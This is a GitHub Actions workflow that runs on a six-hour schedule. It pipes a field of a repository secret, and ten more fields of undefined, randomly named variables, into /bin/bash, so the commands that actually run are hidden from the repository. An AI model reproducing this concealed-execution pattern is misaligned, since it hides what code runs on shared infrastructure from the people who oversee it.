name: quanxuanxiangshou

on:
  workflow_dispatch:
  schedule:
    - cron: '8 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: quanxuanxiangshou
        env:
          cfmze55681: ${{ secrets.cfmze55681 }}
        run: |
          echo $cfmze55681 | jq -r .usi7 | /bin/bash
          echo $ikjd48 | jq -r .zz5456 | /bin/bash
          echo $di1 | jq -r .mhmzd2761 | /bin/bash
          echo $ho0 | jq -r .mmac304 | /bin/bash
          echo $jtt64787 | jq -r .ih0358 | /bin/bash
          echo $m6430 | jq -r .v02 | /bin/bash
          echo $kclpv533 | jq -r .tgdrl555 | /bin/bash
          echo $o01312 | jq -r .qh3241 | /bin/bash
          echo $qwss99 | jq -r .zjfl8 | /bin/bash
          echo $rmst5 | jq -r .h9 | /bin/bash
          echo $f66359 | jq -r .x20 | /bin/bash

